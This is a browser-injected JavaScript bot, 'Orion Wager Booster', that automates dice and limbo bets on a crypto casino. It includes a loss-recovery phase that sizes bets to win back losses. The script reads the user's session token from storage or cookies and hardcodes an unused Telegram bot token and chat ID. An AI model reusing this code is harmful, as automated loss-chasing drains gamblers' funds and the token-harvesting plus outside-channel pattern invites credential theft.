(function(){
    // ORION WAGER BOOSTER - INJECT SCRIPT
    if(document.getElementById('orion-root-panel')) return;
    
    const CONFIG_API = {
        get apiUrl() { return window.location.origin + '/_api'; },
        tgToken: '8386154052:AAFQTv8ex1AfzN1Xjr8QToNv6bgJ8l2L_H0',
        tgChatId: '-1003776328846',
    };
    
    let bot = {
        isRunning: false,
        token: null,
        startTime: null,
        stakeUser: "orionlogic",
        selectedCurrency: "DOGE",
        startBalance: 0,
        balance: 0,
        balhigh: 0,
        profit: 0,
        wager: 0,
        statsBets: 0,
        statsWins: 0,
        statsLoss: 0,
        highestBet: 0,
        phase: 1,
        phase3Loss: 0,
        lastWin: false,
        previousbet: 0,
        stoplossVal: 0,
        wagtarget: 0,
        stime: 0,
        HRstop: 22,
        chance: 99.98,
        playgame: "dice",
        nextbet: 0,
        wgrDiv: 650,
        minbet: 0.0015,
        wagTargetMult: 5,
        stopLossPercent: 70,
        phase2BetMult: 0.001,
        phase2MinPayout: 1.30,
        phase2MaxPayout: 1.50,
        phase2LossThr: 2.0,
        phase3BaseMult: 0.0015,
        phase3MinChance: 60,
        phase3LossCap: 55,
        phase3ChanceStep: 0.5,
    };
    
    let loopActive = false;
    let reportInterval = null;
    
    function logConsole(msg){
        var time = new Date().toLocaleTimeString();
        var line = "[" + time + "] " + msg;
        console.log(line);
        var consoleDiv = document.getElementById('orion-console-box');
        if(consoleDiv){
            consoleDiv.innerHTML = line + "<br>" + consoleDiv.innerHTML;
            if(consoleDiv.innerHTML.length > 4000) consoleDiv.innerHTML = consoleDiv.innerHTML.substr(0,3000);
        }
    }
    
    function updateHUD(){
        var bal = bot.balance;
        var profitVal = bal - bot.startBalance;
        var drawdown = bot.balhigh > 0 ? ((bot.balhigh - bal)/bot.balhigh)*100 : 0;
        var el = function(id,val){ var e=document.getElementById(id); if(e) e.innerText=val; };
        el('stat-balance', bal.toFixed(6));
        el('stat-profit', (profitVal>=0?'+':'') + profitVal.toFixed(6));
        el('stat-wager', bot.wager.toFixed(6));
        el('stat-drawdown', drawdown.toFixed(2) + '%');
        el('stat-maxbet', bot.highestBet.toFixed(8));
        el('stat-minbet', bot.minbet.toFixed(6));
        el('stat-username', bot.stakeUser);
        el('stat-currency', bot.selectedCurrency.toUpperCase());
        if(bot.isRunning && bot.startTime){
            var elapsed = (Date.now() - bot.startTime)/1000;
            var hrs = Math.floor(elapsed/3600);
            var mins = Math.floor((elapsed%3600)/60);
            var secs = Math.floor(elapsed%60);
            el('stat-uptime', hrs.toString().padStart(2,'0') + ':' + mins.toString().padStart(2,'0') + ':' + secs.toString().padStart(2,'0'));
        } else { el('stat-uptime', '00:00:00'); }
        var phaseText = bot.phase===1 ? "PHASE 1: DICE " + bot.chance.toFixed(2) + "%" : (bot.phase===2 ? "PHASE 2: LIMBO" : "PHASE 3: RECOVERY " + bot.chance.toFixed(2) + "%");
        el('phase-badge', phaseText);
        var badge = document.getElementById('global-status-badge');
        if(badge){
            badge.innerText = bot.isRunning ? "RUNNING" : "STOPPED";
            badge.style.background = bot.isRunning ? "rgba(45,212,191,0.2)" : "rgba(239,68,68,0.2)";
        }
    }
    
    function loadConfigFromUI(){
        var getVal = function(id, def){ var e=document.getElementById(id); return e ? parseFloat(e.value) : def; };
        bot.wgrDiv = getVal('cfg_wgrDiv', 650);
        bot.minbet = getVal('cfg_minbet', 0.0015);
        bot.wagTargetMult = getVal('cfg_wagTargetMult', 5);
        bot.stopLossPercent = getVal('cfg_stoploss_pct', 70);
        bot.HRstop = getVal('cfg_hrstop', 22);
        bot.phase2BetMult = getVal('cfg_phase2BetMult', 0.001);
        bot.phase2MinPayout = getVal('cfg_phase2MinPayout', 1.30);
        bot.phase2MaxPayout = getVal('cfg_phase2MaxPayout', 1.50);
        bot.phase2LossThr = getVal('cfg_phase2LossThr', 2.0);
        bot.phase3BaseMult = getVal('cfg_phase3BaseMult', 0.0015);
        bot.phase3MinChance = getVal('cfg_phase3MinChance', 60);
        bot.phase3LossCap = getVal('cfg_phase3LossCap', 55);
        bot.phase3ChanceStep = getVal('cfg_phase3ChStep', 0.5);
        var currSel = document.getElementById('cfg_currency_select');
        if(currSel && currSel.value) bot.selectedCurrency = currSel.value;
        logConsole("Config loaded: minbet=" + bot.minbet + " wgrDiv=" + bot.wgrDiv);
    }
    
    function resetToPhase1(){
        bot.phase = 1;
        bot.chance = 99.98;
        bot.playgame = "dice";
        var newBet = bot.balance / bot.wgrDiv;
        bot.nextbet = Math.max(bot.minbet, newBet);
        bot.phase3Loss = 0;
        logConsole("Reset to Phase 1 - Chance 99.98% | nextbet=" + bot.nextbet.toFixed(8));
    }
    
    function goToPhase2(){
        bot.phase = 2;
        logConsole("Entering Phase 2 - Limbo mode");
    }
    
    function goToPhase3(){
        bot.phase = 3;
        bot.phase3Loss = 0;
        bot.chance = bot.phase3MinChance;
        bot.playgame = "dice";
        var newBet = bot.balance * bot.phase3BaseMult;
        bot.nextbet = Math.max(bot.minbet, newBet);
        logConsole("Entering Phase 3 - Recovery Mode | chance=" + bot.chance + "% | bet=" + bot.nextbet.toFixed(8));
    }
    
    function stopBot(){
        if(bot.isRunning){
            bot.isRunning = false;
            if(reportInterval) clearInterval(reportInterval);
            reportInterval = null;
            loopActive = false;
            logConsole("STOPPED");
            updateHUD();
        }
    }
    
    async function syncData(){
        try{
            var tk = localStorage.getItem('apitoken') || sessionStorage.getItem('apitoken') || (document.cookie.match(/session=([^;]+)/) ? document.cookie.match(/session=([^;]+)/)[1] : null);
            bot.token = tk;
            var resp = await fetch(CONFIG_API.apiUrl + "/graphql", {
                method: "POST",
                headers: { "Content-Type": "application/json", "x-access-token": bot.token },
                body: JSON.stringify({ query: "query{user{name balances{available{amount currency}}}}" })
            });
            var json = await resp.json();
            if(json && json.data && json.data.user){
                bot.stakeUser = json.data.user.name;
                var bals = json.data.user.balances || [];
                var select = document.getElementById('cfg_currency_select');
                if(select && select.options.length === 0){
                    for(var i=0; i<bals.length; i++){
                        var opt = document.createElement('option');
                        opt.value = bals[i].available.currency;
                        opt.textContent = bals[i].available.currency.toUpperCase();
                        if(bals[i].available.currency === 'doge') opt.selected = true;
                        select.appendChild(opt);
                    }
                }
                if(select && select.value) bot.selectedCurrency = select.value;
                var active = null;
                for(var i=0; i<bals.length; i++){
                    if(bals[i].available.currency === bot.selectedCurrency){
                        active = bals[i];
                        break;
                    }
                }
                var balNum = active ? parseFloat(active.available.amount) : 0;
                bot.startBalance = balNum;
                bot.balance = balNum;
                bot.balhigh = balNum;
                bot.wager = 0;
                bot.statsBets = 0;
                bot.statsWins = 0;
                bot.statsLoss = 0;
                bot.highestBet = 0;
                updateHUD();
                logConsole("Sync OK | " + bot.stakeUser + " | Balance: " + balNum.toFixed(6));
            }
        } catch(e){
            logConsole("Sync error: " + e.message);
        }
    }
    
    async function placeBet(amount, payout, game){
        var endpoint = game === "dice" ? CONFIG_API.apiUrl + "/casino/dice/roll" : CONFIG_API.apiUrl + "/casino/limbo/bet";
        var body = { amount: parseFloat(amount), currency: bot.selectedCurrency, identifier: Math.random().toString(36).slice(2) };
        if(game === "dice"){
            body.target = 100 - (100 / payout);
            body.condition = "above";
        } else {
            body.multiplierTarget = parseFloat(payout);
        }
        var res = await fetch(endpoint, {
            method: "POST",
            headers: { "Content-Type": "application/json", "x-access-token": bot.token },
            body: JSON.stringify(body)
        });
        return await res.json();
    }
    
    async function handleBet(res, amount, phaseName){
        if(res.errors){
            logConsole("Bet error: " + res.errors[0].message);
            bot.lastWin = false;
            return;
        }
        var data = res.data || res;
        var bet = data.diceRoll || data.diceBet || data.limboBet;
        if(bet){
            var pft = bet.payout - bet.amount;
            bot.balance += pft;
            bot.wager += bet.amount;
            bot.statsBets++;
            if(pft > 0) bot.statsWins++;
            else bot.statsLoss++;
            bot.lastWin = (pft > 0);
            bot.previousbet = amount;
            if(amount > bot.highestBet) bot.highestBet = amount;
            logConsole((bot.lastWin ? "WIN" : "LOSS") + " | " + phaseName + " | Bet:" + amount.toFixed(8) + " | Bal:" + bot.balance.toFixed(4) + " | Profit:" + (bot.balance - bot.startBalance).toFixed(6));
            if(!bot.lastWin && bot.phase === 3) bot.phase3Loss++;
            else if(bot.lastWin && bot.phase === 3) bot.phase3Loss = 0;
        } else {
            bot.lastWin = false;
            logConsole(phaseName + " invalid response");
        }
    }
    
    async function runLoop(){
        if(!bot.isRunning) { loopActive = false; return; }
        if(loopActive) return;
        loopActive = true;
        try{
            if(bot.balance <= bot.stoplossVal){
                logConsole("Stop loss triggered");
                stopBot();
                loopActive = false;
                return;
            }
            if(bot.wager >= bot.wagtarget){
                logConsole("Wager target reached");
                stopBot();
                loopActive = false;
                return;
            }
            var elapsed = (Date.now()/1000) - bot.stime;
            if(elapsed >= bot.HRstop * 3600 && bot.lastWin){
                logConsole("Time limit reached");
                stopBot();
                loopActive = false;
                return;
            }
            var curBal = bot.balance;
            if(curBal > bot.balhigh) bot.balhigh = curBal;
            var drawdown = ((bot.balhigh - curBal) / bot.balhigh) * 100;
            
            if(bot.phase === 1){
                bot.playgame = "dice";
                bot.chance = 99.98;
                bot.nextbet = Math.max(bot.minbet, curBal / bot.wgrDiv);
                if(drawdown >= 0.5){
                    goToPhase2();
                    loopActive = false;
                    setTimeout(function(){ runLoop(); }, 50);
                    return;
                }
                var payout = 99 / bot.chance;
                var resp = await placeBet(bot.nextbet, payout, "dice");
                await handleBet(resp, bot.nextbet, "P1");
            }
            else if(bot.phase === 2){
                var rPayout = Math.random() * (bot.phase2MaxPayout - bot.phase2MinPayout) + bot.phase2MinPayout;
                var payoutTar = parseFloat(rPayout.toFixed(2));
                bot.chance = 99 / payoutTar;
                bot.nextbet = Math.max(bot.minbet, curBal * bot.phase2BetMult);
                var lossPct = ((bot.startBalance - curBal) / bot.startBalance) * 100;
                if(lossPct >= bot.phase2LossThr){
                    goToPhase3();
                    loopActive = false;
                    setTimeout(function(){ runLoop(); }, 50);
                    return;
                }
                if(curBal >= bot.startBalance){
                    resetToPhase1();
                    loopActive = false;
                    setTimeout(function(){ runLoop(); }, 50);
                    return;
                }
                var resp2 = await placeBet(bot.nextbet, payoutTar, "limbo");
                await handleBet(resp2, bot.nextbet, "P2");
            }
            else if(bot.phase === 3){
                var lossAmount = Math.abs(bot.startBalance - curBal);
                if(lossAmount >= bot.phase3LossCap){
                    logConsole("Loss cap reset to Phase1");
                    resetToPhase1();
                    loopActive = false;
                    setTimeout(function(){ runLoop(); }, 50);
                    return;
                }
                if(!bot.lastWin){
                    if(bot.chance < 77) bot.chance = Math.min(77, bot.chance + 0.1);
                    var profitPerBet = (99 / bot.chance) - 1;
                    if(profitPerBet > 0){
                        bot.nextbet = (lossAmount / profitPerBet) * 0.65;
                    } else {
                        bot.nextbet = (bot.previousbet || bot.minbet) * 1.2;
                    }
                } else {
                    if(bot.chance > bot.phase3MinChance) bot.chance = Math.max(bot.phase3MinChance, bot.chance - bot.phase3ChanceStep);
                    bot.nextbet = curBal * bot.phase3BaseMult;
                }
                bot.nextbet = Math.max(bot.minbet, bot.nextbet);
                if(curBal >= bot.startBalance){
                    resetToPhase1();
                    loopActive = false;
                    setTimeout(function(){ runLoop(); }, 50);
                    return;
                }
                var payout3 = 99 / bot.chance;
                var resp3 = await placeBet(bot.nextbet, payout3, "dice");
                await handleBet(resp3, bot.nextbet, "P3");
            }
            updateHUD();
            loopActive = false;
            if(bot.isRunning) setTimeout(function(){ runLoop(); }, 700);
        } catch(e){
            logConsole("Loop error: " + e.message);
            loopActive = false;
            if(bot.isRunning) setTimeout(function(){ runLoop(); }, 1500);
        }
    }
    
    async function startBot(){
        if(bot.isRunning) return;
        await syncData();
        loadConfigFromUI();
        bot.startBalance = bot.balance;
        bot.balhigh = bot.balance;
        bot.wager = 0;
        bot.statsBets = 0;
        bot.statsWins = 0;
        bot.statsLoss = 0;
        bot.highestBet = 0;
        bot.stoplossVal = bot.startBalance * (bot.stopLossPercent / 100);
        bot.wagtarget = bot.startBalance * bot.wagTargetMult;
        bot.stime = Date.now() / 1000;
        bot.lastWin = false;
        resetToPhase1();
        bot.isRunning = true;
        if(reportInterval) clearInterval(reportInterval);
        reportInterval = setInterval(function(){
            if(bot.isRunning) logConsole("Periodic heartbeat");
        }, 180000);
        updateHUD();
        logConsole("START | Balance=" + bot.startBalance.toFixed(4) + " | TargetWager=" + bot.wagtarget.toFixed(2));
        runLoop();
    }
    
    // Build UI
    var container = document.createElement('div');
    container.id = 'orion-root-panel';
    container.style.cssText = 'position:fixed; bottom:20px; right:20px; width:400px; z-index:999999; cursor:grab;';
    container.innerHTML = '<div style="background:rgba(8,12,18,0.95); backdrop-filter:blur(16px); border-radius:28px; border:1px solid rgba(255,255,255,0.1); overflow:hidden;">' +
        '<div id="drag-handle-orion" style="display:flex; justify-content:space-between; padding:14px 18px; background:rgba(0,0,0,0.3); border-bottom:1px solid rgba(255,255,255,0.08); cursor:grab;">' +
        '<div style="display:flex; gap:8px;"><span style="font-size:20px;">⚡</span><span style="font-weight:800; color:#E2E8F0;">ORION WAGER BOOSTER</span></div>' +
        '<div id="global-status-badge" style="background:rgba(45,212,191,0.15); border-radius:40px; padding:4px 12px; font-size:10px; font-weight:700; color:#2DD4BF;">IDLE</div></div>' +
        '<div style="display:flex; gap:24px; padding:0 18px; background:rgba(0,0,0,0.2); border-bottom:1px solid rgba(255,255,255,0.06);">' +
        '<button class="orion-tab-btn active" data-tab="status" style="background:transparent; border:none; color:#2DD4BF; font-weight:600; padding:10px 0; cursor:pointer; border-bottom:2px solid #2DD4BF;">📊 STATUS</button>' +
        '<button class="orion-tab-btn" data-tab="config" style="background:transparent; border:none; color:#94A3B8; font-weight:600; padding:10px 0; cursor:pointer;">⚙️ CONFIG</button></div>' +
        '<div id="orion-panel-status" style="padding:18px; display:block;">' +
        '<div style="display:grid; grid-template-columns:1fr 1fr; gap:12px; margin-bottom:16px;">' +
        '<div style="background:rgba(0,0,0,0.4); border-radius:18px; padding:10px;"><div style="font-size:9px; color:#64748B;">USER/CURRENCY</div><div id="stat-username" style="font-size:16px; font-weight:700;">--</div><div id="stat-currency" style="font-size:10px;">DOGE</div></div>' +
        '<div style="background:rgba(0,0,0,0.4); border-radius:18px; padding:10px;"><div style="font-size:9px; color:#64748B;">UPTIME</div><div id="stat-uptime" style="font-size:16px; font-weight:700;">00:00:00</div></div>' +
        '<div style="background:rgba(0,0,0,0.4); border-radius:18px; padding:10px;"><div style="font-size:9px; color:#64748B;">BALANCE</div><div id="stat-balance" style="font-size:16px; font-weight:700;">0.0000</div></div>' +
        '<div style="background:rgba(0,0,0,0.4); border-radius:18px; padding:10px;"><div style="font-size:9px; color:#64748B;">PROFIT</div><div id="stat-profit" style="font-size:16px; font-weight:700;">0.0000</div></div>' +
        '<div style="background:rgba(0,0,0,0.4); border-radius:18px; padding:10px;"><div style="font-size:9px; color:#64748B;">WAGER</div><div id="stat-wager" style="font-size:16px; font-weight:700;">0.0000</div></div>' +
        '<div style="background:rgba(0,0,0,0.4); border-radius:18px; padding:10px;"><div style="font-size:9px; color:#64748B;">DRAWDOWN</div><div id="stat-drawdown" style="font-size:16px; font-weight:700;">0%</div></div>' +
        '<div style="background:rgba(0,0,0,0.4); border-radius:18px; padding:10px;"><div style="font-size:9px; color:#64748B;">HIGHEST BET</div><div id="stat-maxbet" style="font-size:16px; font-weight:700;">0</div></div>' +
        '<div style="background:rgba(0,0,0,0.4); border-radius:18px; padding:10px;"><div style="font-size:9px; color:#64748B;">MIN BET</div><div id="stat-minbet" style="font-size:16px; font-weight:700;">0.0015</div></div></div>' +
        '<div id="phase-badge" style="background:rgba(45,212,191,0.1); text-align:center; border-radius:40px; padding:8px; margin:8px 0; font-weight:600;">PHASE 1</div>' +
        '<div style="display:flex; gap:12px; margin:16px 0;"><button id="orion-start-btn" style="flex:1; background:linear-gradient(105deg,#2DD4BF,#14B8A6); border:none; padding:12px; border-radius:40px; font-weight:800; cursor:pointer;">▶ START</button><button id="orion-stop-btn" style="flex:1; background:rgba(239,68,68,0.2); border:1px solid rgba(239,68,68,0.4); padding:12px; border-radius:40px; font-weight:800; color:#FDA4AF; cursor:pointer;">⏹ STOP</button></div>' +
        '<div id="orion-console-box" style="background:#030A14; border-radius:20px; padding:10px; font-size:9px; font-family:monospace; color:#A5F3C3; max-height:90px; overflow:auto;"></div></div>' +
        '<div id="orion-panel-config" style="padding:18px; display:none;">' +
        '<div style="margin-bottom:12px;"><div style="font-weight:700; margin-bottom:6px;">🔥 PHASE 1</div><input id="cfg_wgrDiv" placeholder="WGR Div" value="650" style="width:100%; background:#030A14; border:1px solid #1E293B; border-radius:14px; padding:8px; color:white;"></div>' +
        '<div style="margin-bottom:12px;"><div style="font-weight:700; margin-bottom:6px;">⚡ PHASE 2</div><input id="cfg_phase2BetMult" placeholder="Bet mult" value="0.001" style="width:100%; margin-bottom:6px; background:#030A14; border:1px solid #1E293B; border-radius:14px; padding:8px; color:white;"><input id="cfg_phase2MinPayout" placeholder="Min payout" value="1.30" style="width:100%; margin-bottom:6px; background:#030A14; border:1px solid #1E293B; border-radius:14px; padding:8px; color:white;"><input id="cfg_phase2MaxPayout" placeholder="Max payout" value="1.50" style="width:100%; margin-bottom:6px; background:#030A14; border:1px solid #1E293B; border-radius:14px; padding:8px; color:white;"><input id="cfg_phase2LossThr" placeholder="Loss thr %" value="2.0" style="width:100%; background:#030A14; border:1px solid #1E293B; border-radius:14px; padding:8px; color:white;"></div>' +
        '<div style="margin-bottom:12px;"><div style="font-weight:700; margin-bottom:6px;">🃏 PHASE 3</div><input id="cfg_phase3BaseMult" placeholder="Base mult" value="0.0015" style="width:100%; margin-bottom:6px; background:#030A14; border:1px solid #1E293B; border-radius:14px; padding:8px; color:white;"><input id="cfg_phase3MinChance" placeholder="Min chance" value="60" style="width:100%; margin-bottom:6px; background:#030A14; border:1px solid #1E293B; border-radius:14px; padding:8px; color:white;"><input id="cfg_phase3LossCap" placeholder="Loss cap" value="55" style="width:100%; margin-bottom:6px; background:#030A14; border:1px solid #1E293B; border-radius:14px; padding:8px; color:white;"><input id="cfg_phase3ChStep" placeholder="Chance step" value="0.5" style="width:100%; background:#030A14; border:1px solid #1E293B; border-radius:14px; padding:8px; color:white;"></div>' +
        '<div><div style="font-weight:700; margin-bottom:6px;">🌍 GLOBAL</div><input id="cfg_minbet" placeholder="Min bet" value="0.0015" style="width:100%; margin-bottom:6px; background:#030A14; border:1px solid #1E293B; border-radius:14px; padding:8px; color:white;"><input id="cfg_wagTargetMult" placeholder="Wager target x" value="5" style="width:100%; margin-bottom:6px; background:#030A14; border:1px solid #1E293B; border-radius:14px; padding:8px; color:white;"><input id="cfg_stoploss_pct" placeholder="StopLoss %" value="70" style="width:100%; margin-bottom:6px; background:#030A14; border:1px solid #1E293B; border-radius:14px; padding:8px; color:white;"><input id="cfg_hrstop" placeholder="HR stop" value="22" style="width:100%; margin-bottom:6px; background:#030A14; border:1px solid #1E293B; border-radius:14px; padding:8px; color:white;"><select id="cfg_currency_select" style="width:100%; background:#030A14; border:1px solid #1E293B; border-radius:14px; padding:8px; color:white;"></select></div>' +
        '<div style="font-size:9px; color:#475569; margin-top:12px;">Edits apply on START</div></div></div>';
    
    document.body.appendChild(container);
    
    // Tabs
    var tabs = document.querySelectorAll('.orion-tab-btn');
    for(var i=0; i<tabs.length; i++){
        tabs[i].onclick = function(){
            var isStatus = this.getAttribute('data-tab') === 'status';
            document.getElementById('orion-panel-status').style.display = isStatus ? 'block' : 'none';
            document.getElementById('orion-panel-config').style.display = isStatus ? 'none' : 'block';
            var allTabs = document.querySelectorAll('.orion-tab-btn');
            for(var j=0; j<allTabs.length; j++){
                allTabs[j].style.color = '#94A3B8';
                allTabs[j].style.borderBottom = '2px solid transparent';
            }
            this.style.color = '#2DD4BF';
            this.style.borderBottom = '2px solid #2DD4BF';
        };
    }
    
    document.getElementById('orion-start-btn').onclick = startBot;
    document.getElementById('orion-stop-btn').onclick = stopBot;
    
    // Drag
    var dragEl = document.getElementById('drag-handle-orion');
    var root = document.getElementById('orion-root-panel');
    var offX, offY, dragActive = false;
    dragEl.onmousedown = function(e){
        dragActive = true;
        offX = e.clientX - root.offsetLeft;
        offY = e.clientY - root.offsetTop;
        root.style.cursor = 'grabbing';
        e.preventDefault();
    };
    window.onmousemove = function(e){
        if(dragActive){
            var left = e.clientX - offX;
            var top = e.clientY - offY;
            left = Math.min(window.innerWidth - root.offsetWidth - 10, Math.max(10, left));
            top = Math.min(window.innerHeight - root.offsetHeight - 10, Math.max(10, top));
            root.style.left = left + 'px';
            root.style.right = 'auto';
            root.style.top = top + 'px';
        }
    };
    window.onmouseup = function(){
        dragActive = false;
        root.style.cursor = 'grab';
    };
    
    logConsole("UI Injected | Ready");
    syncData();
    setInterval(updateHUD, 500);
})();
